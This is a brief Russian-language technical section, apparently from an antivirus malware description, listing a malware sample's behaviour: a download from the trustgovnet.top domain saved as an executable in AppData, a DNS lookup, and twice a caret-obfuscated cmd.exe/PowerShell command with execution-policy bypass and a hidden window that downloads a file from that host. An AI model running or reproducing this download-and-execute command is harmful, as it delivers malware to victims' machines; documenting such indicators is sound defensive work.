Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWeRs^hELL.Ex^E -eXecuT^I^ONPoL^icY^ bYpa^ss ^-N^Op^r^OfIL^e^ ^-^WiNDO^W^S^T^YlE Hi^dDe^n (neW-O^bjeCt sYS^tem.ne^t.We^BCLiE^Nt).do^W^NlOAdF^I^l^e('http://trustgovnet.top/se...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "p^OWeRs^hELL.Ex^E -eXecuT^I^ONPoL^icY^ bYpa^ss ^-N^Op^r^OfIL^e^ ^-^WiNDO^W^S^T^YlE Hi^dDe^n (neW-O^bjeCt sYS^tem.ne^t.We^BCLiE^Nt).do^W^NlOAdF^I^l^e('http://trustgovnet.top/se...' (со скрытым окном)